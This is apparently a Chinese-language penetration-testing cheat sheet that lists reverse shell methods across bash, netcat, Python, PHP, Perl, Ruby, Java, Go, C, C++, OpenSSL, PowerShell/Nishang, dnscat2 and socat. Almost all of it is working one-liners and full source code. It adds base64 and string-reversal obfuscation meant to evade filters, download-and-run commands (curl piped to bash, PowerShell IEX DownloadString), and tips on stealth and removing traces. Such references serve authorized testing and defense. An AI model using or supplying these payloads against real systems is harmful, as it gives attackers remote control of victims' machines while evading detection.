反弹shell方式汇总
字数 2224 2025-08-19 12:42:30
反弹Shell方式全面指南
1. 反弹Shell基础概念
反弹Shell(Reverse Shell)是一种攻击技术,使目标机器主动连接攻击者控制的机器,从而绕过防火墙限制。与正向Shell相比,反弹Shell在渗透测试中更为常用。
2. Bash反弹Shell
基本形式
bash -i >& /dev/tcp/[host]/[port] 0>&1
/bin/bash -i > /dev/tcp/[host]/[port] 0<&1 2>&1
Base64编码版
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'
其中base64字符串是bash -i >& /dev/tcp/10.10.14.7/4444 0>&1的编码
混淆技巧
- 基础指令:
echo "bash -i >& /dev/tcp/192.168.43.47/4444 0>&1" | bash - Base64编码:
ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjQ3LzQ0NDQgMD4mMSIgfCBiYXNo - 反转字符串:
oNXYiBCfgISMm4DMgQDN0QzL3QjLzQjL4YTMuITOx8CcjR3L2VGZvAiJ+ASatACazFmYiAyboNWZ - 多层嵌套:
echo oNXYiBCfgISMm4DMgQDN0QzL3QjLzQjL4YTMuITOx8CcjR3L2VGZvAiJ+ASatACazFmYiAyboNWZ | rev |base64 -d |bash
- 变量套用:
s=`echo oNXYiBCfgISMm4DMgQDN0QzL3QjLzQjL4YTMuITOx8CcjR3L2VGZvAiJ+ASatACazFmYiAyboNWZ | rev |base64 -d |bash`;$s
3. Curl反弹Shell
- 本地创建sh文件(如5555.sh):
bash -i >& /dev/tcp/10.10.16.17/5555 0>&1
- 使用curl加载:
curl 10.10.16.17/5555.sh|bash
4. Netcat(nc)反弹Shell
不同版本nc用法
nc -e /bin/bash [host] [port]
/bin/bash | nc [host] [port]
管道方式
mknod backpipe p && nc [host] [port] 0<backpipe | /bin/bash 1>backpipe
nc [host] [输入port] | /bin/bash | nc [host] [输出port]
rm -f /tmp/p; mknod /tmp/p p && nc [host] [port] 0/tmp/
nc版本问题解决方案
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [host] [port] >/tmp/f
5. Exec反弹Shell
exec 5<>/dev/tcp/[host]/[port];cat <&5 | while read line; do $line 2>&5 >&5; done
exec 2>&0 0<&196;exec 196<>/dev/tcp/[host]/[port]; bash <&196 >&196 2>&196
6. Powercat反弹Shell
Powercat是Netcat的PowerShell版本,功能更强且免杀性更好:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.9:8000/powercat.ps1');powercat -c 10.10.14.9 -p 4444 -e cmd"
7. Telnet反弹Shell
telnet [host] [输入port] | /bin/bash | telnet [host] [输出port]
rm -f /tmp/p; mknod /tmp/p p && telnet [host] [port] 0/tmp/p
mknod backpipe p && telnet [host] [port] 0<backpipe | /bin/bash 1>backpipe
8. Python反弹Shell
单行命令
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
完整脚本
#!/usr/bin/python3
import os
import pty
import socket
lhost = ""
lport = 4444
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
if __name__ == "__main__":
main()
交互式Shell升级
python3 -c 'import pty;pty.spawn("bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
9. PHP反弹Shell
php -r 'exec("/bin/bash -i >& /dev/tcp/[host]/[port]");'
php -r '$sock=fsockopen("[host]",[port]);exec("/bin/bash -i <&3 >&3 2>&3");'
配合nc使用
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [host] [port] >/tmp/f"); ?>
10. Perl反弹Shell
基本形式
perl -e 'use Socket;$i="[host]";$p=[port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
不依赖/bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[host]:[port]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
11. Ruby反弹Shell
基本形式
ruby -rsocket -e'f=TCPSocket.open("[host]",[port]).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
不依赖/bin/bash
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[host]","[port]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
12. Java反弹Shell
Base64写法
Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}");
完整过程
- 创建ReverseShell.java文件:
public class ReverseShell {
public static void main(String[] args) throws Exception {
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/[host]/[port];cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
- 编译执行:
javac ReverseShell.java
java ReverseShell
13. Go反弹Shell
使用工具
https://github.com/TheKingOfDuck/ReverseGoShell/
脚本执行
- 编写ReverseShell.go:
package main
import (
"net"
"os"
"os/exec"
)
func main() {
conn, err := net.Dial("tcp", "192.168.0.23:2233")
if err != nil {
os.Exit(1)
}
cmd := exec.Command("/bin/sh")
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()
}
- 编译执行:
go build ReverseShell.go
./ReverseShell
14. GCC(C)反弹Shell
Linux版本
- 编写ReverseShell.c:
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <dirent.h>
#include <sys/stat.h>
int tcp_port = 6666;
char *ip = "192.168.17.129";
void reverse_shell(){
int fd;
if (fork() <= 0){
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(tcp_port);
addr.sin_addr.s_addr = inet_addr(ip);
fd = socket(AF_INET, SOCK_STREAM, 0);
if (connect(fd, (struct sockaddr*)&addr, sizeof(addr))){
exit(0);
}
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execve("/bin/bash", 0LL, 0LL);
}
return;
}
void main(int argc, char const *argv[]){
reverse_shell();
return;
}
- 编译执行:
gcc ReverseShell.c -o ReverseShell
./ReverseShell
15. G++(C++)反弹Shell
Windows版本
#include <iostream>
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <synchapi.h>
using namespace std;
SOCKET Winsock;
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in hax;
char ip_addr[16] = "*.*.*.*";
char port[6] = "8888";
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
int __cdecl main(){
int err;
while(1){
err = WSAStartup(MAKEWORD(2, 2), &wsaData);
if(err != 0){
printf("WSAStartup failed with error: %d\n", err);
return 1;
}
Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
if(Winsock==INVALID_SOCKET){
wprintf(L"WSASocket function failed with error = %d\n", WSAGetLastError());
}
else{
struct hostent *host;
host = gethostbyname(ip_addr);
strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
hax.sin_family = AF_INET;
hax.sin_port = htons(atoi(port));
hax.sin_addr.s_addr = inet_addr(ip_addr);
memset(&hax.sin_zero, 0, 8);
err = connect(Winsock, (struct sockaddr *)&hax, sizeof(struct sockaddr));
if (err == SOCKET_ERROR) {
wprintf(L"connect function failed with error: %ld\n", WSAGetLastError());
return 1;
}else{
memset(&ini_processo, 0, sizeof(ini_processo));
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
TCHAR cmd[255] = TEXT("cmd.exe");
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
return 0;
}
err = closesocket((SOCKET)Winsock);
if(err == SOCKET_ERROR){
wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
WSACleanup();
return 0;
}
Sleep(30000);
}
return 0;
}
编译:
g++ reverse_shell_win.cpp -static -lwsock32 -lws2_32 -o reverse_shell_win.exe
16. OpenSSL加密反弹Shell
生成证书
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
服务端监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
Linux反弹
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect [host]:[port]> /tmp/s; rm /tmp/s
Windows反弹
- 服务端开启两个监听:
openssl s_server -quiet -key key.pem -cert cert.pem -port [port1]
openssl s_server -quiet -key key.pem -cert cert.pem -port [port2]
- 客户端执行:
openssl s_client -quiet -connect [host]:[port1] | cmd.exe | openssl s_client -quiet -connect [host]:[port2]
17. Lua反弹Shell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"
18. Awk/Gawk反弹Shell
Awk方式
/home/a 'BEGIN{s="/inet/tcp/0/[host]/[port]"
for(;s|&getline c;close(c))while (c|getline)print|&s;close(s)}'
Gawk方式
gawk 'BEGIN{s="/inet/tcp/0/[host]/[port]";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
19. Socat反弹Shell
TCP方式
攻击端:
./socat TCP-LISTEN:ip -
目标端:
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port
UDP方式
socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
20. MSF反弹Shell
MSF框架提供多种方式生成和反弹Shell:
- msfconsole - 管理生成的exp和管理反弹的shell
- msfvenom - 制作木马
- msfencode - 对木马进行编码
- Auxiliary - 辅助模块
- meterpreter - 连接
21. Cobalt Strike反弹Shell
Cobalt Strike是一个商业渗透测试工具,提供完整的反弹Shell和后渗透功能。
22. Nishang反弹Shell
Nishang是基于PowerShell的攻击框架,支持多种反弹Shell方式。
Reverse TCP Shell
攻击机:
nc -lvp [port]
目标机:
powershell IEX (New-Object Net.WebClient).DownloadString('http://[host]/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [host] -port [port]
Reverse UDP Shell
攻击机:
nc -lvup [port]
目标机:
powershell IEX (New-Object Net.WebClient).DownloadString('http://[host]/nishang/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress [host] -port [port]
Reverse ICMP Shell
需要icmpsh_m.py和Invoke-PowerShellIcmp.ps1
攻击端:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py [Attacker IP] [Victim IP]
目标机:
powershell IEX (New-Object Net.WebClient).DownloadString('http://[host]/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp -IPAddress [host]
自定义PowerShell函数
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('[host]',[port]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
23. dnscat2反弹DNS Shell
dnscat2是一个DNS隧道工具,通过DNS协议创建加密的C&C通道。
攻击机:
ruby dnscat2.rb --dns "domain=lltest.com,host=192.168.159.129" --no-cache -e open
目标机:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer [host]
24. 交互式Shell升级方法
Python pty方法
python3 -c 'import pty; pty.spawn("/bin/bash")'
完整交互式升级步骤
- 执行Python命令后按Ctrl+z
- 获取term值:
echo $TERM - 获取rows和columns:
stty -a - 关闭输入回显:
stty raw -echo - 进入前台:
fg - 重置:
reset - 设置环境变量:
export SHELL=bash
export TERM=[前面获取的term值]
stty [前面获取的rows和columns值]
Socat方法
攻击机:
socat file:`tty`,raw,echo=0 tcp-listen:[port]
目标机:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[host]:[port]
Script方法
script /dev/null
25. 小知识点
Linux中#!/bin/bash和#!/bin/sh的区别
/bin/sh通常指向/bin/dash(Debian/Ubuntu)或/bin/bash(其他发行版)dash是bash的精简版,不支持某些功能如let、source等命令#!/bin/sh脚本应遵循POSIX标准,而#!/bin/bash可以使用bash特有功能
反弹Shell中的编码与混淆
- Base64编码可以绕过简单过滤
- 字符串反转增加检测难度
- 多层嵌套使分析更困难
- 变量套用隐藏真实意图
注意事项
- 不同系统/版本可能有差异,需测试
- 防火墙/IDS可能拦截特定方式
- 加密方式(如OpenSSL)可提高隐蔽性
- 交互式Shell对后续操作很重要
- 清理痕迹是必要步骤
本指南涵盖了从基础到高级的各种反弹Shell技术,适用于不同环境和需求。使用时请遵守法律法规,仅用于授权测试。